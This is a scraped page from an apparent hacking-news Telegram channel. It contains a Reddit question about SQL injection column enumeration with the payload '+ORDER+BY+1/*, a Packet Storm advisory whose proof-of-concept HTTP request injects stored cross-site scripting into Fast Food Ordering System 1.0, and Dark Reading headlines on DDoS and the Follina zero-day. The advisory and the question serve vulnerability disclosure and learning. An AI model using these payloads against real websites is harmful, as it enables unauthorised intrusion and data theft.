Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66.1K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Puzzled With this SQL injection

I'm practicing SQL injection, and I am using burpsuite. In a website, I am trying to find out the number of columns, and so I am using a command like: '+ORDER+BY+1/* However, no matter how many times I increment the number by, I am still getting a '200 okay'. Surely this site cannot have infinite columns, so I can only assume that I'm doing something wrong. Does anyone have any suggestions?

submitted by /u/Queer_Gerblin
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Fast Food Ordering System 1.0 Cross Site Scripting

https://4.bp.blogspot.com/-xhbT4GX8v9w/WWlvF89jtmI/AAAAAAAAILM/fSSkvnm11QwzZu21RJEqwX2S4icQcxCngCLcBGAs/s1600/h136.png
Fast Food Ordering System version 1.0 suffers from a persistent cross site scripting vulnerability.

SHA-256 | f7e3bfe2b6055902c2854c036cbb8c36e7bf630d5e1d2ceaaf2629e5cb4d4c8d

Download
## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting
## Author: Ashish Kumar
## Date: 05.31.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software:
https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html
## Reference:
https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6

#Description:
#The Line 255 of Master.php sends unvalidated data to a web browser, which
can result in the browser executing malicious code.

#echo $Master->save_category();

#PoC:
POST /ffos/classes/Master.php?f=save_category HTTP/1.1
Host: localhost
Content-Length: 480
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/ffos/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj
Connection: close

------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="id"

10
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="description"

Testing XSS ">
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="status"

1
------WebKitFormBoundarySmYVeqOBMhcSziZM--

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
How Fuzzing helps me to get my first bounty?

Hello Everyone,Continue reading on Medium »
Read more...
Dark Reading: Attacks/Breaches
Fewer DDoS Attacks in 2021, Still Above Pre-Pandemic Levels

New research finds a rise in TCP acknowledgement (ACK) DDoS attacks, which rely on a smaller amount of traffic to disrupt targets.
Dark Reading: Attacks/Breaches
Biometric Data Offers Added Security — But Don't Lose Sight of These Important Risks

With rising fraud, businesses are seeking authentication methods that are security- and user-friendly. But with that comes a few complications.
Dark Reading: Attacks/Breaches
New Microsoft Zero-Day Attack Underway

"Follina" vulnerability in Microsoft Support Diagnostic Tool (MSDT) affects all currently supported Windows versions and can be triggered via specially crafted Office documents.